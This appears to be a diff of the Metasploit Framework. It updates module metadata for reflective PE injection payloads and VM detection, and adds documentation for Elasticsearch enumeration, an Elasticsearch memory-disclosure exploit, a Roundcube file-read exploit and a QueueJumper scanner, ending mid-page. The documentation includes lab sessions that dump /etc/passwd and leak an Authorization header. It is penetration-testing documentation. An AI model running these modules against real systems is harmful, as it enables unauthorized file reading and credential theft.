    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x64",
@@ -231703,7 +233064,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x64",
@@ -231743,7 +233104,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x64",
@@ -231782,7 +233143,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker via a named pipe pivot",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x64",
@@ -231821,7 +233182,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x64",
@@ -231865,7 +233226,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x64",
@@ -231905,7 +233266,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x64",
@@ -234426,7 +235787,7 @@
    "author": [
      "James Otten <jamesotten1@gmail.com>"
    ],
-    "description": "This module attempts to determine whether the system is running\n          inside of a container and if so, which one. This module supports\n          detection of Docker, LXC, and systemd nspawn.",
+    "description": "This module attempts to determine whether the system is running\n          inside of a container and if so, which one. This module supports\n          detection of Docker, WSL, LXC, Podman and systemd nspawn.",
    "references": [

    ],
@@ -234436,7 +235797,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-02-08 13:47:34 +0000",
+    "mod_time": "2023-07-19 19:47:17 +0000",
    "path": "/modules/post/linux/gather/checkcontainer.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/checkcontainer",
@@ -234473,7 +235834,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-02-08 13:47:34 +0000",
+    "mod_time": "2023-08-22 12:36:48 +0000",
    "path": "/modules/post/linux/gather/checkvm.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/checkvm",
@@ -240581,9 +241942,11 @@
      "Carlos Perez <carlos_perez@darkoperator.com>",
      "Aaron Soto <aaron_soto@rapid7.com>"
    ],
-    "description": "This module attempts to determine whether the system is running\n          inside of a virtual environment and if so, which one. This\n          module supports detection of Hyper-V, VMWare, Virtual PC,\n          VirtualBox, Xen, and QEMU.",
+    "description": "This module attempts to determine whether the system is running\n          inside of a virtual environment and if so, which one. This\n          module supports detection of Hyper-V, VMWare, VirtualBox, Xen, QEMU,\n          and Parallels.",
    "references": [
-
+      "URL-https://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf",
+      "URL-https://www.heise.de/security/downloads/07/1/1/8/3/5/5/9/vmde.pdf",
+      "URL-https://evasions.checkpoint.com/techniques/registry.html"
    ],
    "platform": "Windows",
    "arch": "",
@@ -240591,7 +241954,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-29 21:28:15 +0000",
+    "mod_time": "2023-08-11 14:42:51 +0000",
    "path": "/modules/post/windows/gather/checkvm.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/checkvm",
@@ -12,8 +12,10 @@ The pgp signatures below can be verified with the following [public key](https:/

 |Download Link|File Type|SHA1|PGP|
 |-|-|-|-|
-| [metasploit-4.22.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
-| [metasploit-4.22.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)|
+| [metasploit-4.22.2-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
+| [metasploit-4.22.2-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
+| [metasploit-4.22.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe.asc)|
+| [metasploit-4.22.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run.asc)|
 | [metasploit-4.22.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe.asc)|
 | [metasploit-4.22.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run.asc)|
 | [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.asc)|
@@ -15,7 +15,7 @@ Follow the steps in the [[Installing AD CS|ad-certificates/overview.md#installin

 ## Module usage

-The `admin/ldap/ad_cs_template` module is generally used to update a certificate template as part of an ESC4 attack.
+The `admin/ldap/ad_cs_cert_template` module is generally used to update a certificate template as part of an ESC4 attack.

 1. From msfconsole
 2. Do: `use auxiliary/admin/ldap/ad_cs_cert_template`
@@ -0,0 +1,112 @@
+## Vulnerable Application
+
+This module enumerates Elasticsearch instances. It uses the REST API
+in order to gather information about the server, the cluster, nodes,
+in the cluster, indicies, and pull data from those indicies.
+
+### Docker
+
+Docker install is quite simple, however it won't come with any data making the results rather boring.
+However, we can use the the [oliver006/elasticsearch-test-data](https://github.com/oliver006/elasticsearch-test-data)
+repo to help auto populate our data.
+
+```
+sudo sysctl -w vm.max_map_count=262144
+git clone https://github.com/oliver006/elasticsearch-test-data.git
+cd elasticsearch-test-data
+docker-compose up --detach
+docker run --rm -it --network host oliver006/es-test-data  \
+    --es_url=http://localhost:9200  \
+    --batch_size=10000  \
+    --username=elastic \
+    --password="esbackup-password"
+```
+
+
+### Install Elasticsearch on Kali Linux
+With this install, we'll install the free community edition of Elasticsearch, which does not require authentication to the API. However,
+this is unrealistic in a production environment which will often leverage a support contract to gain authentication, a reverse proxy to
+add basic authentication, and/or a host firewall to restrict access to this API.
+
+The following instructions assume you are beginning with a fresh Kali installation as the root user.
+
+1. `useradd -M -r elasticsearch`
+2. `su elasticsearch`
+3. `cd /tmp`
+4. `curl -L -O https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-6.3.2.tar.gz`
+5. `tar -xvf elasticsearch-6.3.2.tar.gz`
+6. `cd elasticsearch-6.3.2/bin`
+7. `./elasticsearch`
+8. Open a new terminal
+9. In the new terminal, `curl -X PUT http://127.0.0.1:9200/msf_test` to create an index for validation purposes
+
+## Verification Steps
+1. `use auxiliary/gather/elasticsearch_enum`
+2. `set RHOSTS [ips]`
+3. `set RPORT [port]`
+4. `run`
+
+## Options
+
+## Scenarios
+### Elasticsearch 7.9.1 on Docker
+```
+msf6 > use auxiliary/gather/elasticsearch_enum
+msf6 auxiliary(gather/elasticsearch/enum) > set ssl false
+[!] Changing the SSL option's value may require changing RPORT!
+ssl => false
+msf6 auxiliary(gather/elasticsearch/enum) > set password esbackup-password
+password => esbackup-password
+msf6 auxiliary(gather/elasticsearch/enum) > set username elastic
+username => elastic
+msf6 auxiliary(gather/elasticsearch/enum) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(gather/elasticsearch/enum) > run
+
+[+] Elastic Information
+===================
+
+  Name  Cluster Name       Version  Build Type  Lucene Version
+  ----  ------------       -------  ----------  --------------
+  es01  es-docker-cluster  7.9.1    docker      8.6.2
+
+[+] Node Information
+================
+
+  IP          Transport Port  HTTP Port        Version  Name  Uptime  Ram Usage    Node Role  Master  CPU Load  Disk Usage
+  --          --------------  ---------        -------  ----  ------  ---------    ---------  ------  --------  ----------
+  172.18.0.2  9300            172.18.0.2:9200  7.9.1    es01  1.1h    5.4gb/5.7gb  dilmrt     -       12%       64.8gb/75.6gb
+  172.18.0.3  9300            172.18.0.3:9200  7.9.1    es02  1.1h    5.4gb/5.7gb  dilmrt     *       12%       64.8gb/75.6gb
+
+[+] Cluster Information
+===================
+
+  Cluster Name       Status  Number of Nodes
+  ------------       ------  ---------------
+  es-docker-cluster  yellow  2
+
+[+] Indicies Information
+====================
+
+  Name       Health  Status  UUID                    Documents  Storage Usage (MB)
+  ----       ------  ------  ----                    ---------  ------------------
+  test_data  yellow  open    Y2Qms9leTf2riFN89Lik6g  100000     8MB
+
+[+] test_data data stored to /root/.msf4/loot/20230824172328_default_127.0.0.1_elasticserch.ind_635067.csv
+[+] User Information
+================
+
+  Name                    Roles                                                       Email  Metadata                                                                                         Enabled
+  ----                    -----                                                       -----  --------                                                                                         -------
+  apm_system              ["apm_system"]                                                     {"_reserved"=>true}                                                                              true
+  beats_system            ["beats_system"]                                                   {"_reserved"=>true}                                                                              true
+  elastic                 ["superuser"]                                                      {"_reserved"=>true}                                                                              true
+  kibana                  ["kibana_system"]                                                  {"_deprecated"=>true, "_deprecated_reason"=>"Please use the [kibana_system] user instead.", "_r  true
+                                                                                             eserved"=>true}
+  kibana_system           ["kibana_system"]                                                  {"_reserved"=>true}                                                                              true
+  logstash_system         ["logstash_system"]                                                {"_reserved"=>true}                                                                              true
+  remote_monitoring_user  ["remote_monitoring_collector", "remote_monitoring_agent"]         {"_reserved"=>true}                                                                              true
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,173 @@
+## Vulnerable Application
+
+Roundcube Webmail allows unauthorized access to arbitrary files on the host's filesystem, including configuration files.
+This affects all versions from 1.1.0 through version 1.3.2. The attacker must be able to authenticate at the target system
+with a valid username/password as the attack requires an active session.
+
+Tested against version 1.3.2
+
+### Install Roundcube 1.3.2 on Ubuntu 22.04
+
+Instructions are loosely based on https://www.digitalocean.com/community/tutorials/how-to-install-your-own-webmail-client-with-roundcube-on-ubuntu-16-04
+
+The main point of pain is installing PHP 7.0 on Ubuntu 22.04
+
+#### Install LAMP
+
+```
+sudo apt-get install -y tasksel
+sudo tasksel install lamp-server
+```
+
+#### Install PHP 7.0
+
+```
+sudo apt install software-properties-common ca-certificates lsb-release apt-transport-https dbconfig-sqlite3
+LC_ALL=C.UTF-8 sudo add-apt-repository ppa:ondrej/php
+sudo apt update
+sudo apt-get install php7.0 php7.0-xml php7.0-mbstring php7.0-intl php7.0-zip php7.0-sqlite3
+sudo a2dismod php8.1
+sudo a2enmod php7.0
+```
+
+#### Configure PHP
+
+```
+sudo nano /etc/php/7.0/apache2/php.ini
+```
+
+Uncomment the following lines:
+
+```
+extension=php_mbstring.dll
+extension=php_xmlrpc.dll
+extension=php_pdo_sqlite.dll
+```
+
+Add the following line to the end of the extension list:
+
+```
+extension=dom.so
+```
+
+Uncomment and change the following values:
+
+```
+date.timezone = "America/New_York"
+upload_max_filesize = 12M
+post_max_size = 18M
+mbstring.func_overload = 0
+```
+
+#### Install dovecot
+
+```
+sudo apt install dovecot-imapd
+```
+
+#### Install Roundcube
+
+```
+wget https://github.com/roundcube/roundcubemail/releases/download/1.3.2/roundcubemail-1.3.2-complete.tar.gz -O /tmp/roundcubemail-1.3.2-complete.tar.gz
+sudo tar -zxf /tmp/roundcubemail-1.3.2-complete.tar.gz -C /var/www/html/
+sudo chown -R root:root /var/www/html/roundcubemail-1.3.2/
+```
+#### Configure Apache
+
+```
+sudo cp /etc/apache2/sites-available/000-default.conf /etc/apache2/sites-available/roundcubemail-1.3.2-complete.config
+sudo vi /etc/apache2/sites-available/roundcubemail-1.3.2-complete.config
+```
+
+Update `ServerName <rhost IP>` `DocumentRoot /var/www/html/roundcubemail-1.3.2/`
+
+Save and close the file, now reload Apache
+
+```
+sudo systemctl restart apache2
+```
+
+Browse to `/installer`.  Almost all settings will be kept as default,
+however, for the database setup we'll use a sqlite db for ease.
+Select `SQLite`, and change the Database name to `/tmp/roundcube.db`.
+all other fields within `db_dsnw` should be blank.
+
+On the next screen, make sure to click the button under Check DB config
+to create the initial database.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/gather/roundcube_auth_file_read`
+1. Do: `set rhost [ip]`
+1. Do: `set USERNAME [username]`
+1. Do: `set PASSWORD [password]`
+1. Do: `run`
+1. You should get contents of specified file.
+
+## Options
+
+## Scenarios
+
+### Roundcube 1.3.2 with php 7.0 on Ubuntu 22.04
+
+```
+resource (msf)> set rhost 10.10.10.10
+rhost => 10.10.10.10
+resource (msf)> set TARGETURI /roundcubemail-1.3.2/
+TARGETURI => /roundcubemail-1.3.2/
+resource (msf)> set rport 80
+rport => 80
+resource (msf)> set verbose true
+verbose => true
+resource (msf)> set USERNAME roundcube_user
+USERNAME => roundcube_user
+resource (msf)> set PASSWORD roundcube_password
+PASSWORD => roundcube_password
+msf6 auxiliary(gather/roundcube_auth_file_read) > run
+[*] Running module against 10.10.10.10
+
+[+] Token Value: JDGak0VjivacBBT9FVJbN4eqaelDHLX0
+[*] Attempting login
+[*] Attempting exploit
+[+] root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+pollinate:x:105:1::/var/cache/pollinate:/bin/false
+sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
+syslog:x:107:113::/home/syslog:/usr/sbin/nologin
+uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
+tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
+tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
+landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
+fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
+usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
+lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
+arangodb:x:998:999:ArangoDB Application User:/usr/share/arangodb3:/bin/false
+dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
+postgres:x:115:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
+dovecot:x:116:122:Dovecot mail server,,,:/usr/lib/dovecot:/usr/sbin/nologin
+dovenull:x:117:123:Dovecot login user,,,:/nonexistent:/usr/sbin/nologin
+roundcube_user:x:1001:1001:,,,:/home/roundcube_user:/bin/bash
+```
@@ -1,46 +0,0 @@
-## Description
-This module identifies a list of indices which an Elasticsearch NoSQL database has. This occurs over the REST API, which on community versions is an unauthenticated API. Customers who subscribe to a support plan can add authentication to this API restricting access.
-
-## Vulnerable Application
-### Install Elasticsearch on Kali Linux:
-With this install, we'll install the free community edition of Elasticsearch, which does not require authentication to the API. However, this is unrealistic in a production environment which will often leverage a support contract to gain authentication, a reverse proxy to add basic authentication, and/or a host firewall to restrict access to this API.
-
-The following instructions assume you are beginning with a fresh Kali installation as the root user.
-
-1. `useradd -M -r elasticsearch`
-2. `su elasticsearch`
-3. `cd /tmp`
-4. `curl -L -O https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-6.3.2.tar.gz`
-5. `tar -xvf elasticsearch-6.3.2.tar.gz`
-6. `cd elasticsearch-6.3.2/bin`
-7. `./elasticsearch`
-8. Open a new terminal
-9. In the new terminal, `curl -X PUT http://127.0.0.1:9200/msf_test` to create an index for validation purposes
-
-## Verification Steps
-1. `use auxiliary/scanner/elasticsearch/indices_enum`
-2. `set RHOSTS [ips]`
-3. `set RPORT [port]`
-4. `run`
-
-
-## Scenarios
-### Elasticsearch 6.3.2 on Kali Linux
-```
-msf > use auxiliary/scanner/elasticsearch/indices_enum
-msf auxiliary(scanner/elasticsearch/indices_enum) > set RHOSTS 10.10.10.25
-RHOSTS => 10.10.10.25
-msf auxiliary(scanner/elasticsearch/indices_enum) > run
-
-[+] ElasticSearch Indices found: msf_test
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-```
-
-## Confirming
-### [elasticsearch](https://www.elastic.co/guide/en/elasticsearch/reference/current/_list_all_indices.html)
- ```
-# curl 'http://10.10.10.25:9200/_cat/indices?v'
-health status index    uuid                   pri rep docs.count docs.deleted store.size pri.store.size
-yellow open   msf_test W83_cAS1QlmePnczS9sLrA   5   1          0            0      1.2kb          1.2kb
-```
@@ -0,0 +1,87 @@
+## Vulnerable Application
+
+This module exploits a memory disclosure vulnerability in Elasticsearch
+7.10.0 to 7.13.3 (inclusive). A user with the ability to submit arbitrary
+queries to Elasticsearch can generate an error message containing previously
+used portions of a data buffer.
+This buffer could contain sensitive information such as Elasticsearch
+documents or authentication details. This vulnerability's output is similar
+to heartbleed.
+
+### Docker Install
+
+`docker run -p 9200:9200 -e "discovery.type=single-node" elasticsearch:7.13.2`
+
+This will start a docker instance, however it will most likely on return
+back empty memory data, or your own query. Running the
+`elasticsearch_enum` module with good or bad credentials will generate
+more interesting data.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/elasticsearch_memory_disclosure`
+1. Do: `set rhosts [ip]`
+1. Do: `run`
+1. You should get a dump of memory.
+
+## Actions
+
+### SCAN
+
+This action will dump the memory and print the leaked bytes count. Set `verbose`
+to true to view the data. Default
+
+### DUMP
+
+This action will dump the memory and print the leaked bytes count. Set `verbose`
+to true to view the data. The output is then stored as loot.
+
+## Options
+
+### LEAK_COUNT
+
+How many times to run the memory dumper. Defaults to `1`
+
+## Scenarios
+
+### Elasticsearch 7.13.2 on Docker
+
+The module is run with action `SCAN`, and `leak_count` set to `2` to have a better chance
+of leaking interesting information.
+
+```
+msf6 > use auxiliary/scanner/http/elasticsearch_memory_disclosure
+msf6 auxiliary(scanner/http/elasticsearch_memory_disclosure) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(scanner/http/elasticsearch_memory_disclosure) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/elasticsearch_memory_disclosure) > set leak_count 2
+leak_count => 2
+msf6 auxiliary(scanner/http/elasticsearch_memory_disclosure) > run
+
+[*] Leaking response #1
+[*] Leaking response #2
+[+] Leaked 2106 bytes
+[*] Printable info leaked:
+HTTP/1.1 200 OK..rnal Server Error..1:9200..User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51..Content-Type: application/json..Content-Length: 2....@.: 2....@.........................................................................................................................................................................................................................................................."[truncated 1048076 bytes].HTTP/1.1 200 OK..rnal Server Error..1:9200..User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51..Content-Type: application/json..Content-Length: 2....@.: 2....@.........................................................................................................................................................................................................................................................."[truncated 1048076 bytes]
+..�aT�!...00 Internal Server Error....User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0..Authorization: Basic YWRtaW46MTIzNDU2.........................................................................................х���...00 OK..rnal Server Error..1:9200..User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51..Content-Type: application/json..Content-Length: 2....@..."[truncated 1048076 bytes]...�aT�!...00 Internal Server Error....User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0..Authorization: Basic YWRtaW46MTIzNDU2.........................................................................................х���...00 OK..rnal Server Error..1:9200..User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51..Content-Type: application/json..Content-Length: 2....@..."[truncated 1048076 bytes]
+[*] Auxiliary module execution completed
+```
+
+In this example, we set the action to `DUMP` to store the data as well.
+
+```
+msf6 auxiliary(scanner/http/elasticsearch_memory_disclosure) > set action dump
+action => dump
+msf6 auxiliary(scanner/http/elasticsearch_memory_disclosure) > run
+
+[*] Leaking response #1
+[*] Leaking response #2
+[+] Leaked 2088 bytes
+[+] Elasticsearch memory data stored in /root/.msf4/loot/20230825124508_default_127.0.0.1_elasticsearch.me_033879.bin
+[*] Printable info leaked:
+HTTP/1.1 400 Bad Request..: 127.0.0.1:9200..User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13.4; rv:109.0) Gecko/20100101 Firefox/114.0..Content-Type: application/json..Content-Length: 2....@................................................................................................................................................................................................................................................................................................................."[truncated 1048076 bytes].HTTP/1.1 400 Bad Request..: 127.0.0.1:9200..User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13.4; rv:109.0) Gecko/20100101 Firefox/114.0..Content-Type: application/json..Content-Length: 2....@................................................................................................................................................................................................................................................................................................................."[truncated 1048076 bytes].�........l�Kn�0.D.��\�`%�&"Q�H�M�.�.�Pd��p0�O���Q.�B�.R�'j/w.������ڈāq�.�[8.��� ��yC]@j"Ͼ�,�� 0...�.�3�-��<��.H�\#.�:�X�.3.��]P�W�uCG��gG��c�N�.��z��y8.X2���B.�����.|���C.�w�.�s�'O��Z$1@�[���<.��?...��nyone. See https://www.elastic.co/guide/en/elasticsearch/reference/7.13/security-minimal-setup.html to enable security."..content-type: application/json; charset=UTF-8..content-encoding: gzip..: none..Sec-Fetch-Mode: cors..Sec-Fetch-Dest: empty..Accept-Encoding: gzip, deflate, br..Accept"[truncated 1048076 bytes]..�........l�Kn�0.D.��\�`%�&"Q�H�M�.�.�Pd��p0�O���Q.�B�.R�'j/w.������ڈāq�.�[8.��� ��yC]@j"Ͼ�,�� 0...�.�3�-��<��.H�\#.�:�X�.3.��]P�W�uCG��gG��c�N�.��z��y8.X2���B.�����.|���C.�w�.�s�'O��Z$1@�[���<.��?...��nyone. See https://www.elastic.co/guide/en/elasticsearch/reference/7.13/security-minimal-setup.html to enable security."..content-type: application/json; charset=UTF-8..content-encoding: gzip..: none..Sec-Fetch-Mode: cors..Sec-Fetch-Dest: empty..Accept-Encoding: gzip, deflate, br..Accept"[truncated 1048076 bytes]
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,77 @@
+[CVE-2023-21554](https://nvd.nist.gov/vuln/detail/CVE-2023-21554) ("QueueJumper") is a Remote Code Execution vulnerability with a CVSS 3.1 base score of 9.8 that could allow unauthenticated attackers to execute code on an unpatched Microsoft Windows system running [Microsoft Message Queuing (MSMQ)](https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms711472(v=vs.85)?redirectedfrom=MSDN).
+
+Security updates exist for Windows Server 2008 incl. R2, Windows Server 2012 incl. R2, Windows Server 2016, Windows Server 2019, Windows Server 2022, Windows 10 and Windows 11. MSMQ was first introduced with Windows NT 4.0 and Windows 2000, therefore it's likely that the vulnerability also exists and remains unpatched in unsupported Microsoft Windows versions.
+
+The module `auxiliary/scanner/msmq/cve_2023_21554_queuejumper` scans the given targets and detects whether a running instance of MSMQ is vulnerable to CVE-2032-21554. The module doesn't affect the stability of the MSMQ service, therefore it could be safely executed against the targets.
+
+## Vulnerable Application
+
+Microsoft Message Queuing (MSMQ) is a message queuing service that was first introduced with Windows NT 4.0 and exists in Microsoft Windows ever since. It needs to be explicitly installed, however many enterprise applications use MSMQ and also Microsoft Exchange installs MSMQ. Applications use MSMQ to send and retrieve messages from message queues.
+
+Besides several RPC-related TCP ports, MSMQ uses TCP port 1801 to receive messages from clients or other queue managers, leveraging the protocol [MS-MQQB](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/85498b96-f2c8-43b3-a108-c9d6269dc4af). By default all queues within a queue manager allow anonymous participants to send messages.
+
+The following operating systems are known to be vulnerable:
+
+- Windows 7
+- Windows Vista
